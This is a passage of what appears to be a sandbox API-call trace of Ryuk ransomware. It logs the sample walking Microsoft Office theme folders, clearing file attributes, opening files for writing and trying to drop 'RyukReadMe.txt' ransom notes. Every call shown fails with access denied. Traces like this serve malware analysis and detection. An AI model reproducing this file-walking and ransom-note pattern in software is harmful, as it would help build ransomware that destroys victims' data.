lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.249] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.249] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.249] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.249] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.249] SetLastError (dwErrCode=0x0) [0133.249] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.249] GetLastError () returned 0x5 [0133.249] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.249] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.250] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.250] SetLastError (dwErrCode=0x0) [0133.250] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.250] GetLastError () returned 0x5 [0133.250] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.250] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.250] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.250] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.250] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.250] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.251] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.251] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.251] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.251] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.252] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.252] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.252] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.ELM", dwFileAttributes=0x80) returned 0 [0133.252] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\slate.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.252] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.252] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.252] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.252] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.252] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.INF", dwFileAttributes=0x80) returned 0 [0133.253] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\slate.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.253] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.253] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.253] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.253] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.253] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.253] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.254] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.254] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.254] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.254] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.254] SetLastError (dwErrCode=0x0) [0133.254] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.254] GetLastError () returned 0x5 [0133.254] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.254] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.254] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.254] SetLastError (dwErrCode=0x0) [0133.254] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.254] GetLastError () returned 0x5 [0133.254] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.254] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.254] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.255] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.255] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.255] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.255] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.255] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.256] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.256] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.256] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.256] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.256] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.ELM", dwFileAttributes=0x80) returned 0 [0133.256] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\sonora.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.257] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.257] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.257] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.257] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.257] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.INF", dwFileAttributes=0x80) returned 0 [0133.257] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\sonora.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.257] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.257] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.257] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.257] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.257] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.258] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.258] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.258] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.258] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.258] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.258] SetLastError (dwErrCode=0x0) [0133.258] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.258] GetLastError () returned 0x5 [0133.258] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.258] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.258] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.258] SetLastError (dwErrCode=0x0) [0133.258] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.258] GetLastError () returned 0x5 [0133.258] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.258] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.258] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.259] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.259] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.259] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.259] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.259] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.259] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.259] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.259] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.259] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.259] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.ELM", dwFileAttributes=0x80) returned 0 [0133.260] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\spring.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.260] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.260] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.260] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.260] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.260] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.INF", dwFileAttributes=0x80) returned 0 [0133.261] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\spring.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.261] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.261] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.261] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.261] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.261] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.262] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.262] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.262] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.262] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.262] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.262] SetLastError (dwErrCode=0x0) [0133.262] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.263] GetLastError () returned 0x5 [0133.263] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.263] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.263] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.263] SetLastError (dwErrCode=0x0) [0133.263] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.263] GetLastError () returned 0x5 [0133.263] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.263] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.263] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.264] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.264] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.264] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.264] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.264] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.264] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.264] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.264] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.264] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.264] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.ELM", dwFileAttributes=0x80) returned 0 [0133.264] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\strtedge.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.265] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.265] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.265] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.265] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.265] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.INF", dwFileAttributes=0x80) returned 0 [0133.266] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\strtedge.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.266] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.266] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.266] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.266] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.266] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.267] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.267] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.267] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.267] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.267] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.267] SetLastError (dwErrCode=0x0) [0133.267] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.267] GetLastError () returned 0x5 [0133.267] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.267] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.267] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.267] SetLastError (dwErrCode=0x0) [0133.267] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.267] GetLastError () returned 0x5 [0133.267] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.267] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.267] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.268] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.268] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.268] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.268] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.268] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 